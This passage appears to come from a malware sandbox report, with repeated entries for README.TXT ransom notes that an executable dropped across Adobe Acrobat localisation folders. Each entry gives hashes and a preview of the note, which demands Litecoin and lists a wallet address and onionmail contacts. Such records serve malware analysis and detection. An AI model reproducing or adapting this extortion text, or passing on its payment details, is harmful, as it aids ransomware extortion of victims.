                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\uk-ua\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\zh-cn\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\zh-tw\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ar-ae\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ca-es\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\cs-cz\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\da-dk\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\de-de\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-ae\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-gb\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-il\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\es-es\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\eu-es\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\fi-fi\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-fr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
